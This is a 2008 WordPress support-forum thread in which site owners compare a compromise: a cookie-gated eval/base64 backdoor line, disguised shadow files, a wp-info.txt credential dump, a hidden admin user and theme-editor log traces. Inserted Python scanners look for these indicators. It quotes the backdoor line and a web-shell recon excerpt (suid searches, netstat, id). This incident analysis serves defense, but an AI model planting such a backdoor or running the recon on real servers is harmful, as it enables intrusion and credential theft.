• Summer

    (@fpmsummer)


    This issue actually involves several sites, running versions 2.1.3, 2.3, 2.3.1, 2.3.2, 2.3.3 and 2.5.

    A couple of the sites had wp-content/uploads writable so they could upload images for use in posts, and files in wp-content/themes writable so they could make theme updates from inside WP.

    Back in early March, I found that several sites had been hit with the ro8kfbsmag.txt hack as mentioned in several threads here, and I’d cleaned those up and upgraded to 2.3.3, since 2.5 wasn’t yet available as a release.

    This past weekend, I discovered several of those sites plus a few additional ones, including 2 brand new sites with 2.5 installed, had many of their files in the writable directories compromised, a bunch of suspicious files uploaded, and database modifications that I cannot explain.

    I’m still trying to unravel the mess and clean it up, but here’s a rundown of tell-tale signs I’ve found.

    Check any .php file for this code added to the top of the file:
    <?php if(md5($_COOKIE['_wp_debugger'])=="--hash excised--"){ eval(base64_decode($_POST['file'])); exit; } ?>

    See if there are any files in writable directories that have the same name as an existing file with the extensions _new.php, _old.php, .php.pngg, .php.jpgg, or .php.giff. These files will be executables that when called from a browser will display a fake “404 Not Found” error, but if called from a script with the matching hash from one of the hacked PHP scripts, will display system info about the server your site is sitting on. Haven’t yet figured out where or how that info is sent to anyone.

    I can send a copy of the script to anyone in WP security if needed, but I don’t know if this kind of thing is preferred to be attached, inline, or zipped, or anything.

    Also see if there’s a wp-info.txt file anywhere in your hierarchy. This file will contain userinfo dumped from the MySQL database… usernames, emails, passwords, everything. Move it ASAP, but check your logs to see if it was accessed already.

    One other thing I noticed, and this happened on the new 2.5 installs as well as the older ones that hadn’t been upgraded yet, was the silent addition of the user “WordPress”, with no info save a password, and an add date of all zeroes. There’s also no indication of user level in the database, and the user doesn’t show up in the User menu. However, when I was going through and deleting unnecessary “admin” logins, “WordPress” came up as one of the user options to reassign posts to… otherwise it might have been a while before I’d found that buried in the database.

    So I’ve asked all the users on those sites to update their passwords, even if they’d just changed them after the ro8kfbsmag hack, but I have to wonder if I missed anything when cleaning up after that hack that they used to continue to get in and do the more widespread and scary stuff of planting of these new scripts to collect system info.

    As far as I can tell, some of these sites may have been compromised for as long as a month, but all of the added files I’ve listed here were added on Apr 10 and Apr 11, except for one site that seems to have had those changes made on Apr 5.

    I am in the process of changing the DB passwords on those sites, and deleting the new “WordPress” user, but any insight on where this might have started would be welcomed. This new user also happened on sites ranging from 2.1 to 2.3 to 2.5.

    What I don’t know yet is if one site was the “in” door, and the rest were compromised by the one script, or if the sites were individually hacked the same way.
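A scanner for the filesystem indicators listed in this post (the cookie-keyed first-line gate, the _new.php/_old.php/.php.pngg/.php.jpgg/.php.giff shadow copies, and wp-info.txt), added here as an example and not code from the thread. It builds a constructed sample site tree to run against; the 32-zero digest is a placeholder for the hash the post excised.

```python
import os
import re
import tempfile

# Indicators named in the thread: a first-line gate keyed on an md5'd cookie,
# shadow copies of real files under odd suffixes, and the wp-info.txt dump.
GATE_RE = re.compile(r"md5\(\s*\$_COOKIE\[\s*['\"][\w-]+['\"]\s*\]\s*\)\s*==\s*['\"][0-9a-f]{32}['\"]")
SUSPECT_SUFFIXES = ("_new.php", "_old.php", ".php.pngg", ".php.jpgg", ".php.giff")

def scan_tree(root):
    """Walk root and return sorted (relative path, reason) pairs for every indicator hit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name == "wp-info.txt":
                hits.append((rel, "credential dump"))
            if name.endswith(SUSPECT_SUFFIXES):
                hits.append((rel, "shadow copy suffix"))
            if name.endswith(".php"):
                with open(path, "rb") as fh:          # only the head: the gate sits on line 1
                    head = fh.read(4096).decode("latin-1")
                if GATE_RE.search(head):
                    hits.append((rel, "cookie-keyed gate"))
    return sorted(hits)

def build_sample_tree():
    """Constructed sample site (not real data): one clean file and four planted indicators."""
    root = tempfile.mkdtemp(prefix="wp-sample-")
    files = {
        "wp-content/themes/default/index.php": "<?php get_header(); ?>\n",
        # placeholder 32-hex digest stands in for the hash excised in the thread
        "wp-content/themes/default/footer.php":
            "<?php if(md5($_COOKIE['_wp_debugger'])==\"" + "0" * 32 + "\"){ exit; } ?>\n",
        "wp-content/uploads/header_old.php": "<?php echo '404 Not Found'; ?>\n",
        "wp-content/uploads/header.php.pngg": "<?php echo '404 Not Found'; ?>\n",
        "wp-includes/wp-info.txt": "constructed placeholder, no real credentials\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for rel, reason in scan_tree(build_sample_tree()):
        print(f"{reason:20} {rel}")
```

Point scan_tree at a real document root to get the same listing for a live site; the gate regex matches any cookie name, so it also catches the ‘qwerty’ variant reported later in the thread.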

Viewing 15 replies - 1 through 15 (of 53 total)
  • Thread Starter Summer

    (@fpmsummer)

    Addendum: I only just noticed this this morning while still cleaning up, and it seems like they changed the WP version to 2.5 in the database.

    I’m logged into a site I know is still running 2.1.3, but the footer in the admin panels says 2.5 now. I still haven’t found a clue about this invisible user “WordPress” with no info about privileges, though.

    Roy

    (@gangleri)

    There already is a thread about this subject and that one has just become active again. Maybe you want to join:
    http://wordpress.org/support/topic/141041?replies=30

    jedsundwall

    (@jedsundwall)

    @gangleri,

    I think FPMSummer is experiencing something different than what’s being discussed on that other thread. I’m having the EXACT same problem. I’ve had to revert my server to a week and a half old backup. It’s a huge pain. I can’t tell if they accessed the wp-info.txt, but I deleted it right away.

    Thread Starter Summer

    (@fpmsummer)

    Gangleri,

    that’s a different hack, but one that hit some sites on our ISP’s shared server back in January/February. They removed like 8-10 instances of that .txt file.

    Jed,

    what version(s) of WP are you running? I had thought that a 2.3.x site that still had user registration turned on might be responsible, but at this point I honestly don’t know where the first point of entry was, and I’m still not sure all of the users on this server have changed their passwords. I have changed all the database passwords, though.

    jedsundwall

    (@jedsundwall)

    Like you, I had a number of sites running different versions. I believe most of them were the latest version before 2.5 was released. It’s difficult to tell because the hacker has changed all of my WP dashboards to say they’re running 2.5.

    All of the weird files showed up on April 10th or 11th, and I didn’t notice them until today. My hosting company keeps server logs for more than a couple of days, so I can’t tell what the point of entry was either.

    I’m sorry I’m not of much help. All I know is that nothing obviously bad has happened yet. As soon as my server’s finished reverting back to April 5th, I’ll be upgrading everything right away.

    appleo

    (@appleo)

    No real answers here either. This is just to confirm a similar situation. A server with 100+ vhosted accounts, and almost all the wordpress installations (various versions thru 2.5) were seemingly hit. All on the 11th, and every one within several minutes, according to timestamps. Which would seem to argue for a single point of entry. But the sheer volume (hundreds of files) might suggest otherwise. Almost everything was either a wordpress file, or something disguised to look like a wordpress file. The script did look for writable areas, and occasionally found non-wordpress stuff, but that was the exception. There were two signatures. Files altered as FPMSummer posted with the first line changed. And new files where all the voodoo was (422 lines), with the first line:

    <?php if(md5($_COOKIE['qwerty'])=="dfa1bcf40aa72fdb46ed40f7651fe76e"){

    I believe all of these were ‘qwerty’ cookies. Grepping for either of those cookie names will find all the filesystem damage. A sample of that code:

    if(!$safe_mode){
        if($os_type == 'nix'){
            $os .= execute('sysctl -n kern.ostype');
            $os .= execute('sysctl -n kern.osrelease');
            $os .= execute('sysctl -n kernel.ostype');
            $os .= execute('sysctl -n kernel.osrelease');
            if(empty($user)) $user = execute('id');
            $aliases = array(
                '' => '',
                'find suid files'=>'find / -type f -perm -04000 -ls',
                'find sgid files'=>'find / -type f -perm -02000 -ls',
                'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
                'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
                'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
                'show opened ports'=>'netstat -an | grep -i listen',
            );
        }else{
            $os_name .= execute('ver');
            $user .= execute('echo %username%');
            $aliases = array(
                '' => '',
                'show runing services' => 'net start',
                'show process list' => 'tasklist'
            );
        }
    }

    Thread Starter Summer

    (@fpmsummer)

    Yep, that’s exactly what showed up on my sites, and all on Apr 10 and Apr 11. The Apr 11 happened in two waves, 3 hours apart. The first batch of files seemed to have all been renamed _old.php, and the second batch of files were the exact same files, but with _new.php.

    I had a lot of WP files with that qwerty cookie added, and several instances of the wp-info.txt with the mysql usernames/passwords dump.

    I did find one file dated Apr 5, but I also saw a lot of log activity going back into March.

    And how did they change my Dashboard to show WP 2.5, when they weren’t running 2.5?

    ia

    (@sofimi)

    guys, i think somebody should “name” this vulnerability so it’s easier to remember. also, i wrote about it here.

    yep, it happened to me too. i first saw the version 2.5 string in the footer and was immediately suspicious, but at first i thought it was because i used the wpau plugin instead of the cpanel upgrade (which i used to install wp the first time around). turns out you have to trust your instincts. 🙂

    i’m also surprised all this happened on april 11 (mine on the 12th) as well.

    i’ve been watching this page and will continue to do so. i hope more people contribute because it was only a few days ago when i tried googling “wp-info.txt” and practically nothing came up.

    whooami

    (@whooami)

    I would agree with anyone who says this isn’t just a 2.5 problem.

    http://www.enunabaldosa.com/deformaciones/wp-includes/wp-info.txt

    The file itself appears to be gone, but because of Google we can get more info:

    http://64.233.167.104/search?q=cache:5AHDLvNRQt8J:www.enunabaldosa.com/deformaciones/wp-includes/+wp-info.txt&hl=en&ct=clnk&cd=22&gl=us

    That’s a 2.3.3 install now. There’s no telling what it was on March 19.

    Furthermore, people running anything other than 2.3.3, 2.5, or 2.0.11 have taken their security into their own hands for some time, and really ought not be surprised to wake up to a site that has been exploited.

    here

    (@here)

    Codex page will hopefully help document:

    http://codex.wordpress.org/Exploits/wp-info

    goodspeed1

    (@goodspeed1)

    We experienced everything mentioned above over the last couple of days, April 6th & 12th. It seems systematic. Once the accounts had been compromised, the hacking began.

    Here’s a few more insights on what happened: http://www.abelcheung.org/advisory/20071210-wordpress-charset.txt

    steps taken:

    1. Changed the admin (level 10) account passwords
    2. Deleted the ‘mysterious’ WordPress admin user
    3. Upgraded most of major blogs to 2.5

    So far so good. (crossing my fingers)

    indigothirdeye

    (@indigothirdeye)

    The hack I believe used a vulnerability in the wp-admin/theme-editor.php. Luckily, we have a script that checks for code changes, and caught the exploit within a half hour of the attack. The logs from our site that was hacked had this in the logs:

    194.110.162.79 - - [15/Apr/2008:14:40:02 -0700] "GET /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    194.110.162.79 - - [15/Apr/2008:14:40:03 -0700] "GET /wp-login.php?redirect_to=%2Fwp-admin%2Ftheme-editor.php%3Ffile%3Dwp-content%2Fthemes%2Fdefault%2Findex.php%26theme%3DWordPress%2BDefault HTTP/1.1" 200 2043 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    194.110.162.79 - - [15/Apr/2008:14:40:03 -0700] "GET /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 200 9620 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    194.110.162.79 - - [15/Apr/2008:14:40:04 -0700] "POST /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    194.110.162.79 - - [15/Apr/2008:14:40:04 -0700] "GET /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default&a=te HTTP/1.1" 200 9832 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    194.110.162.79 - - [15/Apr/2008:14:40:05 -0700] "POST /wp-content/themes/default/index.php HTTP/1.1" 200 43 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    194.110.162.79 - - [15/Apr/2008:14:40:06 -0700] "POST /wp-content/themes/default/index.php HTTP/1.1" 200 7895 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    194.110.162.79 - - [15/Apr/2008:14:40:07 -0700] "POST /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"
    194.110.162.79 - - [15/Apr/2008:14:40:08 -0700] "GET /wp-login.php HTTP/1.1" 200 1835 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3"

    Both sites had the WordPress and WordPressx user added to the wp-users table. Neither had a wp-info.txt luckily, but many of the .giff and .pngg’s were found. There were also 2 files in the /tmp/ directory numbered 1 and 2 with full directory listings of the sites. We immediately launched a “Deny any” on the theme-editor.php files to prevent further attacks using this method and cleaned up what we could find.
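The sequence in the log above, a POST to wp-admin/theme-editor.php followed a second later by POSTs to the theme file that was just saved, is easy to pick out of an Apache access log. The detector below is an added example, not the poster’s own change-monitoring script; its sample lines are constructed with TEST-NET addresses. Because the theme editor only accepts saves from an administrator session, this catches the modification, not the initial way in.

```python
import re
from datetime import datetime, timedelta

# Apache combined-log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse(line):
    """Return a dict for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, ts, method, path, status = m.groups()
    return {"ip": ip, "ts": datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"),
            "method": method, "path": path, "status": int(status)}

def theme_editor_writes(lines, window=timedelta(minutes=5)):
    """Flag a POST to theme-editor.php followed, from the same client within `window`,
    by a POST to a file under wp-content/themes: the edited template being driven."""
    last_save = {}   # client ip -> time of its most recent theme-editor save
    alerts = []
    for rec in filter(None, map(parse, lines)):
        if rec["method"] != "POST":
            continue
        if rec["path"].startswith("/wp-admin/theme-editor.php"):
            last_save[rec["ip"]] = rec["ts"]
        elif (rec["path"].startswith("/wp-content/themes/") and rec["ip"] in last_save
              and timedelta(0) <= rec["ts"] - last_save[rec["ip"]] <= window):
            alerts.append((rec["ip"], last_save[rec["ip"]].isoformat(), rec["path"]))
    return alerts

# Constructed sample (TEST-NET addresses, not real traffic): the first client performs
# the save-then-POST sequence seen in the thread; the second only fetches and posts once.
SAMPLE_LOG = """\
203.0.113.5 - - [15/Apr/2008:14:40:04 -0700] "POST /wp-admin/theme-editor.php?file=wp-content/themes/default/index.php&theme=WordPress+Default HTTP/1.1" 302 - "-" "Mozilla/5.0"
203.0.113.5 - - [15/Apr/2008:14:40:05 -0700] "POST /wp-content/themes/default/index.php HTTP/1.1" 200 43 "-" "Mozilla/5.0"
198.51.100.7 - - [15/Apr/2008:14:41:00 -0700] "GET /wp-content/themes/default/index.php HTTP/1.1" 200 7895 "-" "Mozilla/5.0"
198.51.100.7 - - [15/Apr/2008:14:41:30 -0700] "POST /wp-content/themes/default/index.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for ip, saved_at, path in theme_editor_writes(SAMPLE_LOG):
        print(f"{ip} saved a theme file at {saved_at} and then posted to {path}")
```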

    whooami

    (@whooami)

    that’s not the exploit. That’s the file access that’s done after someone has admin access. AND if you attempt to call that file without being logged in, and having the proper permissions, you will find you are promptly redirected to logging in, just as you ought to be.

    You cannot access that file as a simple subscriber. You must be an admin.

    Devs (Donncha, specifically) have already looked at something similar weeks ago, when I originally saw it happening on another blog that had been exploited.

    Want to know what ultimately solved the hacking?

    1. upgrading the blog
    2. changing the admin passwords
    3. changing all the cookies.

    and the deny all.. that just forces apache to do work it doesn’t need to. If you’re going to block everyone from using the file, delete it, or ctrl-k the content.

    You don’t gain anything by looking at 403’s — they’re all proxies or rooted shells.

    None of this is new, and I’m willing to continue playing devil’s advocate and say that until someone comes up with real evidence that 2.5, or even 2.3 is the root cause of the problem.. that it’s useless conjecture and fear mongering.

    If someone has admin access they can do whatever your file permissions allow, it’s just that simple. And if they can write to a file, they can create a root shell. If they can create a root shell, they can add users to your database, etc.. They also no longer need admin access once the php root shell is in place.

    That’s why when a new version comes out, ppl are urged to upgrade. Countless numbers don’t.

    This is specifically why I have suggested setting up logging on some of these blogs —

    1. you’re missing the key piece of the puzzle : how they got admin access in the first place.

    In fact, you posted the login in your paste above. They can be seen logging in.

    ia

    (@sofimi)

    yeah, i do want to know how they got admin access as well. fyi, after i wrote about this security issue, the “WordPress” user appeared in the database(s) again. does this mean i’d have to generate new database passwords all over again? sigh.

  • The topic ‘Security issue, multiple sites’ is closed to new replies.